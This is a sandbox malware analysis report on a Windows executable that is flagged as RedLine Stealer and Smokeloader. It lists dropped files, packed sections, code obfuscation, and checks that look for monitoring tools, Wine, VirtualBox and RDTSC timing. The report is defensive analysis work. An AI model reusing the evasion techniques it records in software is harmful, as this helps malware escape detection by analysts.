Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040EF09 1_2_0040EF09
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041572E 1_2_0041572E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_1000E184 1_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_100102A0 1_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 1_2_00601846
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DA074 1_2_005DA074
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D3424 1_2_005D3424
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DF0C2 1_2_005DF0C2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004880F8 1_2_004880F8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DBC9E 1_2_005DBC9E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E2576 1_2_005E2576
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E4117 1_2_005E4117
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CFD32 1_2_005CFD32
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CC92C 1_2_005CC92C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D1923 1_2_005D1923
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00480DE6 1_2_00480DE6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005451A1 1_2_005451A1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005E0E0A 1_2_005E0E0A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004CAA36 1_2_004CAA36
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D6AC2 1_2_005D6AC2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005252FE 1_2_005252FE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DD691 1_2_005DD691
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00494298 1_2_00494298
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004BBE93 1_2_004BBE93
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004FBAAA 1_2_004FBAAA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CAEA6 1_2_005CAEA6
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005D4F44 1_2_005D4F44
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005CE32C 1_2_005CE32C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E56 1_2_006F5E56
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E84 1_2_006F5E84
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006F5E93 1_2_006F5E93
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_049351D7 1_2_049351D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493EE2E 1_2_0493EE2E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933FA7 1_2_04933FA7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04945995 1_2_04945995
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_049351D7 1_2_049351D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493B937 1_2_0493B937
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0493F170 1_2_0493F170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04940BA7 1_2_04940BA7
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0493AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A7A0 appears 35 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Sample file is different than original file name gathered from version info
Source: file.exe, 00000001.00000003.1734839314.000000000526C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000001.00000003.1734619327.0000000005DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9951234076433121
Source: file.exe Static PE information: Section: olgpsnjw ZLIB complexity 0.99229768222981
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 1_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04788464 CreateToolhelp32Snapshot,Module32First, 1_2_04788464
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4708
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\23RE4w32fN Jump to behavior
Source: C:\Users\user\Desktop\file.exe Command line argument: nosub 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 1_2_004087E0
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 644
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Cleaner.lnk.1.dr LNK file: ..\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe
Source: file.exe Static file information: File size 1995776 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of olgpsnjw is bigger than: 0x100000 < 0x1a5000

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olgpsnjw:EW;sccxqdxh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Binary contains a suspicious time stamp
Source: Y-Cleaner.exe.1.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: dll[1].1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Y-Cleaner.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: soft[1].1.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1e843a should be: 0x1f6ecf
Source: Bunifu_UI_v1.5.3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x400e1
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: olgpsnjw
Source: file.exe Static PE information: section name: sccxqdxh
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040A237 push ecx; ret 1_2_0040A24A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00421B7D push esi; ret 1_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_1000E891 push ecx; ret 1_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F5497 push ecx; mov dword ptr [esp], esi 1_2_005F8363
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F5497 push edi; mov dword ptr [esp], esp 1_2_005F8367
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F4CB5 push 186079D5h; mov dword ptr [esp], edi 1_2_005F7347
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060B06B push 1093FA19h; mov dword ptr [esp], edx 1_2_0060B0F1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060B06B push 466D9CC7h; mov dword ptr [esp], eax 1_2_0060B10E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006D487F push eax; ret 1_2_006D488E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006C687B push 1AB8BC02h; mov dword ptr [esp], edx 1_2_006C6883
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 push 03F8F741h; mov dword ptr [esp], ecx 1_2_00601900
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 push 6842EF4Ah; mov dword ptr [esp], ebx 1_2_0060192F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006B2058 push 68E70CBCh; mov dword ptr [esp], esp 1_2_006B20D4
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065C05D push esi; mov dword ptr [esp], eax 1_2_0065C0BC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00690832 push 45CCCACCh; mov dword ptr [esp], esi 1_2_00690865
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00690832 push ecx; mov dword ptr [esp], 55ED2DE4h 1_2_00690883
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00684037 push edi; mov dword ptr [esp], ecx 1_2_00684071
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0067F803 push 69F21E02h; mov dword ptr [esp], ecx 1_2_0067F860
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00651012 push 77CB7FF6h; mov dword ptr [esp], ebp 1_2_0065104B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006C601B push ebx; mov dword ptr [esp], esi 1_2_006C603E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006648CD push 529E7051h; mov dword ptr [esp], esi 1_2_00664904
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006648CD push 366DB9F7h; mov dword ptr [esp], ebx 1_2_00664928
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0068F0D1 push ecx; mov dword ptr [esp], edi 1_2_0068F17A
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065A8AA push edx; mov dword ptr [esp], ecx 1_2_0065A8DB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0065A8AA push 01276239h; mov dword ptr [esp], ebx 1_2_0065A95B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006ED89C push 301729F5h; mov dword ptr [esp], esi 1_2_006ED8C8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0060309A push 6E37A73Dh; mov dword ptr [esp], ecx 1_2_006030D7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00654973 push eax; mov dword ptr [esp], 4C2A23B8h 1_2_006549B1
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006AA94D push 4B1E0A33h; mov dword ptr [esp], ebx 1_2_006AA973
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_006BA136 push 49BEE2D7h; mov dword ptr [esp], ebx 1_2_006BA1D9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0066E110 push eax; mov dword ptr [esp], ebx 1_2_0066E131
Source: file.exe Static PE information: section name: entropy: 7.942270007630704
Source: file.exe Static PE information: section name: olgpsnjw entropy: 7.949609738056107
Source: Y-Cleaner.exe.1.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].1.dr Static PE information: section name: .text entropy: 7.918511524700298
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9EAA second address: 5E9EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9EAE second address: 5E9EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE82 second address: 5CDE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE86 second address: 5CDE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CDE8E second address: 5CDE93 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E92B7 second address: 5E92E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FCBA46BC736h 0x0000000b jmp 00007FCBA46BC744h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jns 00007FCBA46BC742h 0x0000001a jo 00007FCBA46BC736h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9421 second address: 5E9428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9428 second address: 5E942D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9704 second address: 5E9734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCBA4817E7Ch 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007FCBA4817E86h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9734 second address: 5E973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E973C second address: 5E9740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC3F0 second address: 5EC49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA46BC744h 0x00000011 popad 0x00000012 nop 0x00000013 add dword ptr [ebp+122D1F8Fh], ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1C48h], edx 0x00000022 mov dword ptr [ebp+122D1C34h], esi 0x00000028 popad 0x00000029 call 00007FCBA46BC739h 0x0000002e jmp 00007FCBA46BC73Dh 0x00000033 push eax 0x00000034 jnp 00007FCBA46BC748h 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jnc 00007FCBA46BC751h 0x00000044 pushad 0x00000045 jc 00007FCBA46BC736h 0x0000004b jmp 00007FCBA46BC743h 0x00000050 popad 0x00000051 mov eax, dword ptr [eax] 0x00000053 jnp 00007FCBA46BC73Eh 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d jp 00007FCBA46BC744h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC49A second address: 5EC49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC49E second address: 5EC4C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, 76h 0x00000009 push 00000003h 0x0000000b mov si, 8A00h 0x0000000f push 00000000h 0x00000011 cmc 0x00000012 movsx edx, ax 0x00000015 push 00000003h 0x00000017 movzx edi, dx 0x0000001a push A13DCAF6h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4C3 second address: 5EC4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
